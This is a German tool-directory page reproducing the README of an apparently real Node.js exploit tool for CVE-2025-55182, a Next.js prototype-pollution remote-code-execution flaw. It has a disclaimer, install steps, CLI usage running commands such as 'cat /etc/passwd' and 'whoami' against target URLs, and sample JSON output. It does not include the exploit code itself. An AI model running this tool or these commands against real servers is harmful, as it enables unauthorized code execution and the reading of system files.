Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-55182-node — CVE-2025-55182 Next.js RCE-Exploit-Tool | Kitploit
Tools/GitHubGitHub/racall/cve-2025-55182-node
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubracall/cve-2025-55182-node

cve-2025-55182-node

CVE-2025-55182 Next.js RCE-Exploit-Tool

Repository anzeigen
12vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182 Next.js RCE Exploit-Tool

Chinesische Dokumentation | Analyse der Schwachstelle


[!CAUTION]

⚠️ HAFTUNGSAUSSCHLUSS - VOR VERWENDUNG LESEN

Dieses Tool ist NUR bestimmt für:

  • Sicherheitsforscher, die Schwachstellenüberprüfungen durchführen
  • Autorisierte Penetrationstests mit ausdrücklicher Genehmigung
  • Bildungs- und Lernzwecke

Unbefugter Zugriff auf Computersysteme ist ILLEGAL.

Durch die Nutzung dieses Tools stimmen Sie zu, dass:

  1. Sie eine ordnungsgemäße Genehmigung eingeholt haben, bevor Sie ein System testen
  2. Sie dieses Tool nicht für böswillige Zwecke verwenden werden
  3. Sie allein für Ihre Handlungen und alle Konsequenzen verantwortlich sind

Der Autor übernimmt KEINE Haftung für Missbrauch dieses Tools.


Ein Remote Code Execution (RCE) Exploit-Tool für die Next.js serverseitige Prototype-Pollution-Schwachstelle.

Schwachstellenübersicht

CVE-2025-55182 ist eine kritische Sicherheitslücke, die Next.js betrifft und es Angreifern ermöglicht, durch manipulierte Anfragen, die Prototype Pollution ausnutzen, Remote Code Execution zu erreichen.

📖 Für eine detaillierte technische Analyse siehe EXPLOIT.md

Betroffene Versionen

Tool herunterladen
  • Bestimmte Versionen von Next.js (siehe offizielle Sicherheitsmeldung)

Funktionsweise

Diese Schwachstelle nutzt den Anforderungsbearbeitungsmechanismus von Next.js Server Actions aus und erreicht durch __proto__-Prototype-Chain-Pollution in Verbindung mit dem Function-Konstruktor die Ausführung beliebigen Codes.

Installation

root@kitploit:~
# Using yarn
yarn install

# Using npm
npm install

Verwendung

Direkte Ausführung

root@kitploit:~
# Basic usage
node index.js <target_url> [command]

# Examples
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"

Mit yarn-Skripten

root@kitploit:~
# Run the tool
yarn start http://localhost:3000 "whoami"

# Or use alias
yarn exploit http://localhost:3000 "ls -la"

# Show help
yarn help

Globale CLI-Installation

root@kitploit:~
# Link globally
yarn link
# or
npm link

# Then use the command directly
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"

# Unlink
yarn unlink

CLI-Optionen

root@kitploit:~
Usage:
  cve-2025-55182 <url> [command]

Arguments:
  url       Target URL (required)
  command   Command to execute (default: whoami)

Options:
  -h, --help     Show help message
  -v, --version  Show version number

Ausgabeformat

Das Tool gibt Ergebnisse im JSON-Format aus:

Erfolgreiche Ausführung

root@kitploit:~
{
  "success": true,
  "message": "",
  "data": "command execution result"
}

Fehlgeschlagene Ausführung

root@kitploit:~
{
  "success": false,
  "message": "error message",
  "data": null
}

Beispiel

root@kitploit:~
$ cve-2025-55182 http://vulnerable-site.com "id"
{
  "success": true,
  "message": "",
  "data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}

Abhängigkeiten

  • axios - HTTP-Client
  • form-data - FormData-Builder

Referenzen

  • Siehe Python-Skripte